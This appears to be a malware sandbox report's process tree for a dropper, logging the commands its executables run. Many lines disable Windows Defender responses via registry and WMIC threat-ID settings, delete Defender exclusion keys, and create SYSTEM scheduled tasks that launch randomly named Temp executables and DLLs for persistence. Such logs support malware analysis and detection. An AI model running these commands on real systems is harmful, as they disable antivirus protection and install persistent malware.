C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:9908
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "xsEpqqHAgqAwsAroz" /SC once /ST 04:08:55 /RU "SYSTEM" /TR "\"C:\Windows\Temp\nyFjvKGtfVGLAKAU\PmsBVDuTBNtRlfz\OvcqVci.exe\" za /site_id 668658 /S" /V1 /F2⤵
- Creates scheduled task(s)
PID:5552
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "xsEpqqHAgqAwsAroz"2⤵PID:10212
-
-
C:\Windows\Temp\nyFjvKGtfVGLAKAU\PmsBVDuTBNtRlfz\wAkNRXh.exeC:\Windows\Temp\nyFjvKGtfVGLAKAU\PmsBVDuTBNtRlfz\wAkNRXh.exe za /site_id 668658 /S1⤵PID:7584
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &2⤵PID:2184
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"3⤵PID:7760
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True4⤵PID:7992
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True5⤵PID:5976
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True6⤵PID:9516
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bRciptYQhTCMvEFWGJ"2⤵PID:8948
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵PID:8364
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:8340
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵PID:9256
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:9484
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\STjmdXhOU\FbTssE.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ArGDBXWmyYtLacf" /V1 /F2⤵
- Creates scheduled task(s)
PID:9632
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ArGDBXWmyYtLacf2" /F /xml "C:\Program Files (x86)\STjmdXhOU\uCaDuwX.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:9484
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "ArGDBXWmyYtLacf"2⤵PID:9608
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ArGDBXWmyYtLacf"2⤵PID:5084
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "dqMFPCMVHmhnSY" /F /xml "C:\Program Files (x86)\gaSWcYIjjvwU2\ioQdNxK.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:8132
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "sOuBCsGGBJoge2" /F /xml "C:\ProgramData\QPFeEjmgnBUOfRVB\IjgdWLv.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:7212
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gdlTlvZfIMOZAvCeb2" /F /xml "C:\Program Files (x86)\YceypsUXabDXnCzNCPR\KeSbAwq.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:9268
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "PcFGIyIlUJyYablHCHc2" /F /xml "C:\Program Files (x86)\NMbcPgNClKinC\ygECwqY.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:7780
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "nMmJzTJTMvgDqJXEl" /SC once /ST 03:32:08 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\nyFjvKGtfVGLAKAU\CPckdJUv\AuyXmKA.dll\",#1 /site_id 668658" /V1 /F2⤵
- Creates scheduled task(s)
PID:9652
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "nMmJzTJTMvgDqJXEl"2⤵PID:9788
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "spuVsxmShKoB" /SC once /ST 01:33:15 /F /RU "Admin" /TR "\"C:\Users\Admin\AppData\Local\Temp\nitzTrLPrXGkZCFFk\jQwYhGxc\SHLRGjh.exe\" 3L /S"2⤵
- Creates scheduled task(s)
PID:10152
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "spuVsxmShKoB"2⤵PID:10144
-
-
C:\Users\Admin\AppData\Local\Temp\61F2.exeC:\Users\Admin\AppData\Local\Temp\61F2.exe1⤵PID:8836
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMgAwAA==2⤵PID:3960
-
-
C:\Users\Admin\AppData\Local\Temp\61F2.exeC:\Users\Admin\AppData\Local\Temp\61F2.exe2⤵PID:9428
-
-
C:\Windows\Temp\nyFjvKGtfVGLAKAU\PmsBVDuTBNtRlfz\OvcqVci.exeC:\Windows\Temp\nyFjvKGtfVGLAKAU\PmsBVDuTBNtRlfz\OvcqVci.exe za /site_id 668658 /S1⤵PID:8540
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &2⤵PID:8364
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"3⤵PID:6244
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True4⤵PID:5052
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True5⤵PID:6436
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True6⤵PID:7768
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bRciptYQhTCMvEFWGJ"2⤵PID:9620
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵PID:8888
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:7316
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵PID:7900
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:9128
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\STjmdXhOU\ShwgPU.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ArGDBXWmyYtLacf" /V1 /F2⤵
- Creates scheduled task(s)
PID:4848
-
-
\??\c:\windows\system32\rundll32.EXEc:\windows\system32\rundll32.EXE "C:\Windows\Temp\nyFjvKGtfVGLAKAU\CPckdJUv\AuyXmKA.dll",#1 /site_id 6686581⤵PID:9836
-
C:\Windows\SysWOW64\rundll32.exec:\windows\system32\rundll32.EXE "C:\Windows\Temp\nyFjvKGtfVGLAKAU\CPckdJUv\AuyXmKA.dll",#1 /site_id 6686582⤵PID:9944
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "nMmJzTJTMvgDqJXEl"3⤵PID:4716
-
-
-
C:\Users\Admin\AppData\Local\Temp\nitzTrLPrXGkZCFFk\jQwYhGxc\SHLRGjh.exeC:\Users\Admin\AppData\Local\Temp\nitzTrLPrXGkZCFFk\jQwYhGxc\SHLRGjh.exe 3L /S1⤵PID:6648